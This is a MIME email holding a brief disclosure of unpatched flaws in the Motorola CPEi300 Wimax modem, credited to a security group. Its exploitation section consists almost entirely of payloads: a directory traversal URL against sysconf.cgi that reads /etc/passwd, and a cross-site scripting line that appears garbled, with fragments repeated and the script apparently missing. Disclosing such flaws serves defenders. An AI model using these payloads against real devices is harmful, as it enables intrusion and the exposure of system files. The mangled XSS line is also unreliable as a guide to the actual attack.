|
This is a multi-part message in MIME format.
--------------040101010802050502040800
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Regards !
--------------040101010802050502040800
Content-Type: text/plain;
name="Motorolla Wimax Modem multiple vulnerabilities.txt"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
filename="Motorolla Wimax Modem multiple vulnerabilities.txt"
#####################################################################################
#
# Name : Motorola Wimax modem CPEi300 Multiple Vulnerabilities
# Author : Usman Saeed
# Company : Xc0re Security Reasearch Group
# Homepage : http://www.xc0re.net
#
#####################################################################################
[Note: User needs to logged in! ]
[*] Attack type : Remote
[*] Patch Status : Unpatched
[*] Exploitation :
[+] Directory traversal
http://Hostname/cgi-bin/sysconf.cgi?page=../../../etc/passwd&action=request&sid=AeoFSFoI4lDs
[+] XSS
"&action=request&sid=AeoFSFoI4lDs">http://Hostname/cgi-bin/sysconf.cgi?page=">"&action=request&sid=AeoFSFoI4lDs
--------------040101010802050502040800--